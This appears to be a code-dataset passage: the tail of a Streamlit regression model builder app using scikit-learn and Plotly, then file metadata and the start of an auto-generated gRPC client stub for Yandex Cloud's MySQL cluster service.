criteria = ['RMSE', 'MSE', 'MAE']
fig = go.Figure([go.Bar(x=criteria, y=[rsme, mse, mae])])
st.plotly_chart(fig)
# Change the bar mode
fig.update_layout(barmode='group')
################################################### Kernel Ridge
def build_model_KernelRidge(df):
"""
It builds a model using Kernel Ridge Regresion Algorithm.
Takes input from streamlit web interface and use those inputs for building the model.
Used GridSearchCV for Hyperparameter Tunning.
Ploting the result using Plotly Framework.
:param df: dataframe containing features and labels.
"""
from sklearn.kernel_ridge import KernelRidge
X = df.iloc[:, :-1] # Using all column except for the last column as X
Y = df.iloc[:, -1] # Selecting the last column as Y
st.markdown('A model is being built to predict the following **Y** variable:')
st.info(Y.name)
# Data splitting
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=split_size)
if scale == 'True':
from sklearn.preprocessing import StandardScaler
cols = X_train.columns
scaler = StandardScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
X_train = pd.DataFrame(X_train, columns=cols)
X_test = pd.DataFrame(X_test, columns=cols)
model = KernelRidge()
if len(ind_var) == 1:
dfx = X_train[ind_var[0]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
st.plotly_chart(fig)
if len(ind_var) == 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
mesh_size = .02
margin = 0
# Create a mesh grid on which we will run our model
x_min, x_max=X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
y_min, y_max=X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
xrange = np.arange(x_min, x_max, mesh_size)
yrange = np.arange(y_min, y_max, mesh_size)
xx, yy = np.meshgrid(xrange, yrange)
# Run model
pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
pred = pred.reshape(xx.shape)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
fig.update_traces(marker=dict(size=3))
fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
st.plotly_chart(fig)
if len(ind_var) > 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
Y_pred_test = clf.predict(dfxtest)
st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
c = len(ind_var)
clf1 = GridSearchCV(model, param_grid)
for i in range(0, c):
dfx = X_train[ind_var[i]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[i]].values.reshape(-1, 1)
clf1.fit(dfx, Y_train)
pred = clf1.predict(dfxtest)
fig = px.scatter(df, x=ind_var[i], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[i]], y=pred, name='Regression Fit'))
st.plotly_chart(fig)
st.write("The best parameters are %s with a score of %0.2f"
% (clf.best_params_, clf.best_score_))
st.subheader('Model Parameters')
st.write(clf.get_params())
st.subheader('Model Performance')
st.write('Coefficient of determination ($R^2$):')
st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
if criterion == 'MSE':
st.write('Mean Squared Error (MSE):')
st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
if criterion == 'MAE':
st.write('Mean Absolute Error (MAE):')
st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
if criterion == 'RMSE':
st.write('Root Mean Squared Error (RMSE):')
st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
if criterion == 'All':
st.write('Mean Squared Error (MSE):')
mse = mean_squared_error(Y_test, Y_pred_test)
st.info("%0.2f" % mse)
st.write('Root Mean Squared Error (RMSE):')
rsme = mean_squared_error(Y_test, Y_pred_test, squared=False)
st.info("%0.2f" % rsme)
st.write('Mean Absolute Error (MAE):')
mae = mean_absolute_error(Y_test, Y_pred_test)
st.info("%0.2f" % mae)
criteria = ['RMSE', 'MSE', 'MAE']
fig = go.Figure([go.Bar(x=criteria, y=[rsme, mse, mae])])
st.plotly_chart(fig)
# Change the bar mode
fig.update_layout(barmode='group')
################################################ Elastic Net
def build_model_ElasticNet(df):
"""
It builds a model using Elastic Net Regresion Algorithm.
Takes input from streamlit web interface and use those inputs for building the model.
Used GridSearchCV for Hyperparameter Tunning.
Ploting the result using Plotly Framework.
:param df: dataframe containing features and labels.
"""
from sklearn.linear_model import ElasticNet
X = df.iloc[:, :-1] # Using all column except for the last column as X
Y = df.iloc[:, -1] # Selecting the last column as Y
st.markdown('A model is being built to predict the following **Y** variable:')
st.info(Y.name)
# Data splitting
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=split_size)
if scale == 'True':
from sklearn.preprocessing import StandardScaler
cols = X_train.columns
scaler = StandardScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
X_train = pd.DataFrame(X_train, columns=cols)
X_test = pd.DataFrame(X_test, columns=cols)
model = ElasticNet()
if len(ind_var) == 1:
dfx = X_train[ind_var[0]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
st.plotly_chart(fig)
if len(ind_var) == 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
mesh_size = .02
margin = 0
# Create a mesh grid on which we will run our model
x_min, x_max=X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
y_min, y_max=X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
xrange = np.arange(x_min, x_max, mesh_size)
yrange = np.arange(y_min, y_max, mesh_size)
xx, yy = np.meshgrid(xrange, yrange)
# Run model
pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
pred = pred.reshape(xx.shape)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
fig.update_traces(marker=dict(size=3))
fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
st.plotly_chart(fig)
if len(ind_var) > 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
Y_pred_test = clf.predict(dfxtest)
st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
c = len(ind_var)
clf1 = GridSearchCV(model, param_grid)
for i in range(0, c):
dfx = X_train[ind_var[i]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[i]].values.reshape(-1, 1)
clf1.fit(dfx, Y_train)
pred = clf1.predict(dfxtest)
fig = px.scatter(df, x=ind_var[i], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[i]], y=pred, name='Regression Fit'))
st.plotly_chart(fig)
st.write("The best parameters are %s with a score of %0.2f"
% (clf.best_params_, clf.best_score_))
st.subheader('Model Parameters')
st.write(clf.get_params())
st.subheader('Model Performance')
st.write('Coefficient of determination ($R^2$):')
st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
if criterion == 'MSE':
st.write('Mean Squared Error (MSE):')
st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
if criterion == 'MAE':
st.write('Mean Absolute Error (MAE):')
st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
if criterion == 'RMSE':
st.write('Root Mean Squared Error (RMSE):')
st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
if criterion == 'All':
st.write('Mean Squared Error (MSE):')
mse = mean_squared_error(Y_test, Y_pred_test)
st.info("%0.2f" % mse)
st.write('Root Mean Squared Error (RMSE):')
rsme = mean_squared_error(Y_test, Y_pred_test, squared=False)
st.info("%0.2f" % rsme)
st.write('Mean Absolute Error (MAE):')
mae = mean_absolute_error(Y_test, Y_pred_test)
st.info("%0.2f" % mae)
criteria = ['RMSE', 'MSE', 'MAE']
fig = go.Figure([go.Bar(x=criteria, y=[rsme, mse, mae])])
st.plotly_chart(fig)
# Change the bar mode
fig.update_layout(barmode='group')
################################################# Gradient boosting
def build_model_GradientBoosting(df):
"""
It builds a model using Gradient Boosting Regression Algorithm.
Takes input from streamlit web interface and use those inputs for building the model.
Used GridSearchCV for Hyperparameter Tunning.
Ploting the result using Plotly Framework.
:param df: dataframe containing features and labels.
"""
from sklearn.ensemble import GradientBoostingRegressor
X = df.iloc[:, :-1] # Using all column except for the last column as X
Y = df.iloc[:, -1] # Selecting the last column as Y
st.markdown('A model is being built to predict the following **Y** variable:')
st.info(Y.name)
# Data splitting
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=split_size)
if scale == 'True':
from sklearn.preprocessing import StandardScaler
cols = X_train.columns
scaler = StandardScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
X_train = pd.DataFrame(X_train, columns=cols)
X_test = pd.DataFrame(X_test, columns=cols)
model = GradientBoostingRegressor()
if len(ind_var) == 1:
dfx = X_train[ind_var[0]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
st.plotly_chart(fig)
if len(ind_var) == 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
mesh_size = .02
margin = 0
# Create a mesh grid on which we will run our model
x_min, x_max=X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
y_min, y_max=X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
xrange = np.arange(x_min, x_max, mesh_size)
yrange = np.arange(y_min, y_max, mesh_size)
xx, yy = np.meshgrid(xrange, yrange)
# Run model
pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
pred = pred.reshape(xx.shape)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
fig.update_traces(marker=dict(size=3))
fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
st.plotly_chart(fig)
if len(ind_var) > 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
Y_pred_test = clf.predict(dfxtest)
st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
c = len(ind_var)
clf1 = GridSearchCV(model, param_grid)
for i in range(0, c):
dfx = X_train[ind_var[i]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[i]].values.reshape(-1, 1)
clf1.fit(dfx, Y_train)
pred = clf1.predict(dfxtest)
fig = px.scatter(df, x=ind_var[i], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[i]], y=pred, name='Regression Fit'))
st.plotly_chart(fig)
st.write("The best parameters are %s with a score of %0.2f"
% (clf.best_params_, clf.best_score_))
st.subheader('Model Parameters')
st.write(clf.get_params())
st.subheader('Model Performance')
st.write('Coefficient of determination ($R^2$):')
st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
if criterion == 'MSE':
st.write('Mean Squared Error (MSE):')
st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
if criterion == 'MAE':
st.write('Mean Absolute Error (MAE):')
st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
if criterion == 'RMSE':
st.write('Root Mean Squared Error (RMSE):')
st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
if criterion == 'All':
st.write('Mean Squared Error (MSE):')
mse = mean_squared_error(Y_test, Y_pred_test)
st.info("%0.2f" % mse)
st.write('Root Mean Squared Error (RMSE):')
rsme = mean_squared_error(Y_test, Y_pred_test, squared=False)
st.info("%0.2f" % rsme)
st.write('Mean Absolute Error (MAE):')
mae = mean_absolute_error(Y_test, Y_pred_test)
st.info("%0.2f" % mae)
criteria = ['RMSE', 'MSE', 'MAE']
fig = go.Figure([go.Bar(x=criteria, y=[rsme, mse, mae])])
st.plotly_chart(fig)
# Change the bar mode
fig.update_layout(barmode='group')
# Page Layout ( Streamlit web Interface )
st.set_page_config(page_title="Regression Model Builder")
st.write("""
# Regression Model Builder
""")
# Sidebar ..............................................
# Sidebar - Collects user input features into dataframe
st.sidebar.header('Upload your CSV data')
uploaded_file = st.sidebar.file_uploader("Upload your input CSV file", type=["csv"])
st.sidebar.header("Parameter Configuration")
split_size = st.sidebar.slider('Data Split Ratio (training set)', 10,90,80,5)
st.sidebar.header("Select Regressor")
reg = st.sidebar.selectbox("Choose Regression Algorithm", options=['Linear Regression', 'SVR',
'Random Forest Regression', 'Adaboost', 'SGD Regression', 'Kernel Ridge Regression',
'ElasticNet Regression', 'Gradient Boosting Regression'])
if reg == 'Random Forest Regression':
st.sidebar.subheader('Learning Parameters')
n_estimators = st.sidebar.slider('Number of estimators (n_estimators)', 0, 500, (10, 50), 50)
n_estimators_step = st.sidebar.number_input('Step size for n_estimators (n_estimators_step)', 10)
st.sidebar.write('---')
max_features = st.sidebar.slider('Max features', 1, 50, (1, 3), 1)
max_features_step = st.sidebar.number_input('Step Size for max Features', 1)
st.sidebar.write('---')
min_samples_split = st.sidebar.slider(
'Minimum number of samples required to split an internal node (min_samples_split)', 1, 10, 2, 1)
min_samples_leaf = st.sidebar.slider('Minimum number of samples required to be at a leaf node (min_samples_leaf)',
1, 10, 2, 1)
st.sidebar.subheader('General Parameters')
random_state = st.sidebar.slider('Seed number (random_state)', 0, 1000, 42, 1)
criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
bootstrap = st.sidebar.selectbox('Bootstrap samples when building trees (bootstrap)', options=[True, False])
oob_score = st.sidebar.selectbox('Whether to use out-of-bag samples to estimate the R^2 on unseen data (oob_score)',
options=[False, True])
n_jobs = st.sidebar.select_slider('Number of jobs to run in parallel (n_jobs)', options=[1, -1])
n_estimators_range = np.arange(n_estimators[0], n_estimators[1] + n_estimators_step, n_estimators_step)
max_features_range = np.arange(max_features[0], max_features[1] + max_features_step, max_features_step)
param_grid = dict(max_features=max_features_range, n_estimators=n_estimators_range)
if reg == 'Adaboost':
st.sidebar.subheader('Learning Parameters')
n_estimators = st.sidebar.slider('Number of estimators (n_estimators)', 0, 500, (10, 50), 50)
n_estimators_step = st.sidebar.number_input('Step size for n_estimators (n_estimators_step)', 10)
st.sidebar.write('---')
criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
lr = [0.0001, 0.001, 0.01, 0.1]
learning_rate = st.sidebar.select_slider('Range of Learning Rate (learning_rate)',
options=[0.0001, 0.001, 0.01, 0.1], value=(0.0001, 0.01))
l = lr.index(learning_rate[0])
r = lr.index(learning_rate[1])
learning_rate_range = lr[l:r + 1]
st.sidebar.write('---')
st.sidebar.header("Loss")
loss = st.sidebar.selectbox("Choose Loss",options=['linear', 'square', 'exponential'])
st.sidebar.subheader('General Parameters')
random_state = st.sidebar.slider('Seed number (random_state)', 0, 1000, 42, 1)
n_jobs = st.sidebar.select_slider('Number of jobs to run in parallel (n_jobs)', options=[1, -1])
n_estimators_range = np.arange(n_estimators[0], n_estimators[1] + n_estimators_step, n_estimators_step)
param_grid = dict(learning_rate = learning_rate_range, n_estimators=n_estimators_range)
if reg == 'Linear Regression':
if uploaded_file is not None:
df = pd.read_csv(uploaded_file)
else:
diabetes = load_diabetes()
X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
Y = pd.Series(diabetes.target, name='response')
df = pd.concat([X, Y], axis=1)
st.sidebar.subheader('Variable Configuration')
ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
st.sidebar.write('---')
criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
if reg == 'SVR':
if uploaded_file is not None:
df = pd.read_csv(uploaded_file)
else:
diabetes = load_diabetes()
X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
Y = pd.Series(diabetes.target, name='response')
df = pd.concat([X, Y], axis=1)
st.sidebar.subheader('Variable Configuration')
ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
st.sidebar.write('---')
criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
st.sidebar.subheader("Hyperparameters for SVR")
st.sidebar.subheader("Kernel")
kernel = st.sidebar.selectbox("Enter from the options", options=['All', 'linear', 'rbf', 'poly'])
numbers = st.sidebar.text_input("Enter values for 'c'. (Separate values with ,)")
C = collect_numbers(numbers)
numbers = st.sidebar.text_input("Enter values for 'gamma'. (Separate values with ,)")
gamma = collect_numbers(numbers)
numbers = st.sidebar.text_input("Enter values for 'epsilon'. (Separate values with ,)")
epsilon = collect_numbers(numbers)
if kernel == 'All':
kernel = ['linear', 'rbf', 'poly']
else:
kernel = [kernel]
param_grid = dict(kernel = kernel, gamma = gamma, epsilon = epsilon, C = C)
if reg == 'SGD Regression':
if uploaded_file is not None:
df = pd.read_csv(uploaded_file)
else:
diabetes = load_diabetes()
X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
Y = pd.Series(diabetes.target, name='response')
df = pd.concat([X, Y], axis=1)
st.sidebar.subheader('Variable Configuration')
ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
st.sidebar.write('---')
criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
st.sidebar.subheader("Standard Scaling")
scale = st.sidebar.selectbox("Scale the data to be between -1 to 1", options=['True', 'False'])
st.sidebar.subheader("Hyperparameters for SGD Regressor")
numbers = st.sidebar.text_input("Enter values for 'alpha'. (Separate values with ,)")
alpha = collect_numbers(numbers)
loss = st.sidebar.selectbox("Loss", options=['All', 'squared_loss', 'huber', 'epsilon_insensitive'])
penalty = st.sidebar.selectbox("Penalty", options=['All', 'l2', 'l1', 'elasticnet'])
learning_rate = st.sidebar.selectbox("Learning Rate", options=['All', 'constant', 'optimal', 'invscaling'])
if loss == 'All':
loss = ['squared_loss', 'huber', 'epsilon_insensitive']
else:
loss = [loss]
if penalty == 'All':
penalty = ['l2', 'l1', 'elasticnet']
else:
penalty = [penalty]
if learning_rate == 'All':
learning_rate = ['constant', 'optimal', 'invscaling']
else:
learning_rate = [learning_rate]
param_grid = dict(alpha = alpha, loss = loss, penalty = penalty, learning_rate = learning_rate)
if reg == 'Kernel Ridge Regression':
if uploaded_file is not None:
df = pd.read_csv(uploaded_file)
else:
diabetes = load_diabetes()
X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
Y = pd.Series(diabetes.target, name='response')
df = pd.concat([X, Y], axis=1)
st.sidebar.subheader('Variable Configuration')
ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
st.sidebar.subheader("Standard Scaling")
scale = st.sidebar.selectbox("Scale the data to be between -1 to 1", options=['True', 'False'])
st.sidebar.write('---')
criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
st.sidebar.write('---')
st.sidebar.subheader("Hyperparameters for Kernel Ridge Regression")
st.sidebar.subheader("Kernel")
kernel = st.sidebar.selectbox("Enter from the options", options=['All', 'linear', 'rbf', 'poly'])
numbers = st.sidebar.text_input("Enter values for 'alpha'. (Separate values with ,)")
alpha = collect_numbers(numbers)
numbers = st.sidebar.text_input("Enter values for 'gamma'. (Separate values with ,)")
gamma = collect_numbers(numbers)
if kernel == 'All':
kernel = ['linear', 'rbf', 'poly']
else:
kernel = [kernel]
param_grid = dict(kernel = kernel, gamma = gamma, alpha = alpha)
if reg == 'ElasticNet Regression':
if uploaded_file is not None:
df = pd.read_csv(uploaded_file)
else:
diabetes = load_diabetes()
X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
Y = pd.Series(diabetes.target, name='response')
df = pd.concat([X, Y], axis=1)
st.sidebar.subheader('Variable Configuration')
ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
st.sidebar.subheader("Standard Scaling")
scale = st.sidebar.selectbox("Scale the data to be between -1 to 1", options=['True', 'False'])
st.sidebar.write('---')
criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
st.sidebar.write('---')
st.sidebar.subheader("Hyperparameters for ElasticNet Regression")
st.sidebar.subheader("Selection")
selection = st.sidebar.selectbox("Enter from the options", options=['All', 'cyclic', 'random'])
numbers = st.sidebar.text_input("Enter values for 'alpha'. (Separate values with ,)", value='1.0')
alpha = collect_numbers(numbers)
numbers = st.sidebar.text_input("Enter values for 'l1_ratio'. (Separate values with ,)", value='0.5')
l1_ratio = collect_numbers(numbers)
fit_intercept = st.sidebar.selectbox("Whether the intercept should be estimated or not", options=['Both', 'True', 'False'])
# if fit_intercept == 'Both' or fit_intercept == 'True':
# normalize = st.sidebar.selectbox("Regressors X will be normalized before regression by subtracting the mean and dividing by the l2-norm",
# options=['Both', 'True', 'False'])
# if normalize == 'Both':
# normalize = ['False', 'True']
# else:
# normalize = [normalize]
if selection == 'All':
selection = ['cyclic', 'random']
else:
selection = [selection]
if fit_intercept == 'Both':
fit_intercept = ['False', 'True']
else:
fit_intercept = [fit_intercept]
# if fit_intercept.__contains__('True'):
# param_grid = dict(selection = selection, l1_ratio = l1_ratio, alpha = alpha,
# fit_intercept = fit_intercept, normalize = normalize)
# else:
param_grid = dict(selection=selection, l1_ratio=l1_ratio, alpha=alpha,
fit_intercept=fit_intercept)
if reg == 'Gradient Boosting Regression':
if uploaded_file is not None:
df = pd.read_csv(uploaded_file)
else:
diabetes = load_diabetes()
X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
Y = pd.Series(diabetes.target, name='response')
df = pd.concat([X, Y], axis=1)
st.sidebar.subheader('Variable Configuration')
ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
st.sidebar.subheader("Standard Scaling")
scale = st.sidebar.selectbox("Scale the data to be between -1 to 1", options=['True', 'False'])
st.sidebar.write('---')
criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
st.sidebar.write('---')
st.sidebar.header("Hyperparameters for Gradient Boosting Regression")
st.sidebar.subheader("Loss")
loss = st.sidebar.selectbox("Enter from the options", options=['All', 'squared_error', 'absolute_error', 'huber',
'quantile'])
st.sidebar.subheader("Learning Rate")
numbers = st.sidebar.text_input("Enter values for 'learning rate'. (Separate values with ,)", value='0.1')
learning_rate = collect_numbers(numbers)
numbers = st.sidebar.text_input("Enter number of estimators. (Separate values with ,)", value='100')
n_estimators = collect_numbers_int(numbers)
numbers = st.sidebar.text_input("Enter values for 'Subsample'. (Separate values with ,)", value='1.0')
subsample = collect_numbers(numbers)
numbers = st.sidebar.text_input("Enter minimum sample Split. (Separate values with ,)", value='2')
min_samples_split = collect_numbers_int(numbers)
numbers = st.sidebar.text_input("Enter minimum samples leaf. (Separate values with ,)", value='1')
min_samples_leaf = collect_numbers_int(numbers)
numbers = st.sidebar.text_input("Enter maximum depth. (Separate values with ,)", value='3')
max_depth = collect_numbers_int(numbers)
max_features = st.sidebar.selectbox("Maximum Features", options=['All', 'auto', 'sqrt', 'log2'])
if loss == 'All':
loss = ['squared_error', 'absolute_error', 'huber', 'quantile']
else:
loss = [loss]
if max_features == 'All':
max_features = ['auto', 'sqrt', 'log2']
else:
max_features = [max_features]
param_grid = dict(loss=loss, learning_rate=learning_rate, n_estimators=n_estimators, subsample=subsample,
min_samples_split=min_samples_split, min_samples_leaf=min_samples_leaf,
max_depth=max_depth, max_features=max_features)
# main Body ...............................................................................................
st.subheader('Dataset')
if uploaded_file is not None:
df = pd.read_csv(uploaded_file)
st.write(df)
if reg == 'Random Forest Regression':
build_model_RandomForestRegressor(df)
if reg == 'Adaboost':
build_model_Adaboost_Regressor(df)
if reg == 'Linear Regression':
build_model_Linear_Regressor(df)
if reg == 'SVR':
build_model_SVR(df)
if reg == 'SGD Regression':
build_model_SGD(df)
if reg == 'Kernel Ridge Regression':
build_model_KernelRidge(df)
if reg == 'ElasticNet Regression':
build_model_ElasticNet(df)
if reg == 'Gradient Boosting Regression':
build_model_GradientBoosting(df)
else:
st.info('Awaiting for CSV file to be uploaded.')
if st.button('Press to use Example Dataset'):
diabetes = load_diabetes()
X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
Y = pd.Series(diabetes.target, name='response')
df = pd.concat([X, Y], axis=1)
st.markdown('The **Diabetes** dataset is used as the example.')
st.write(df.head(5))
if reg == 'Random Forest Regression':
build_model_RandomForestRegressor(df)
if reg == 'Adaboost':
build_model_Adaboost_Regressor(df)
if reg == 'Linear Regression':
build_model_Linear_Regressor(df)
if reg == 'SVR':
build_model_SVR(df)
if reg == 'SGD Regression':
build_model_SGD(df)
if reg == 'Kernel Ridge Regression':
build_model_KernelRidge(df)
if reg == 'ElasticNet Regression':
build_model_ElasticNet(df)
if reg == 'Gradient Boosting Regression':
build_model_GradientBoosting(df)
| 39.018466
| 147
| 0.619953
| 7,631
| 54,938
| 4.290263
| 0.054908
| 0.025291
| 0.022542
| 0.020159
| 0.848743
| 0.833379
| 0.823086
| 0.821894
| 0.811448
| 0.798436
| 0
| 0.013981
| 0.237085
| 54,938
| 1,408
| 148
| 39.018466
| 0.767137
| 0.101296
| 0
| 0.825153
| 0
| 0.002045
| 0.176295
| 0.001533
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009202
| false
| 0
| 0.023517
| 0
| 0.033742
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63085c24e340e92fae937acc8225a7326b90926f
| 38,244
|
py
|
Python
|
yandex/cloud/mdb/mysql/v1/cluster_service_pb2_grpc.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 36
|
2018-12-23T13:51:50.000Z
|
2022-03-25T07:48:24.000Z
|
yandex/cloud/mdb/mysql/v1/cluster_service_pb2_grpc.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 15
|
2019-02-28T04:55:09.000Z
|
2022-03-06T23:17:24.000Z
|
yandex/cloud/mdb/mysql/v1/cluster_service_pb2_grpc.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 18
|
2019-02-23T07:10:57.000Z
|
2022-03-28T14:41:08.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.mdb.mysql.v1 import cluster_pb2 as yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__pb2
from yandex.cloud.mdb.mysql.v1 import cluster_service_pb2 as yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
class ClusterServiceStub(object):
"""A set of methods for managing MySQL clusters.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/Get',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.GetClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__pb2.Cluster.FromString,
)
self.List = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/List',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersResponse.FromString,
)
self.Create = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/Create',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Update = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/Update',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Delete = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/Delete',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.SerializeToString,
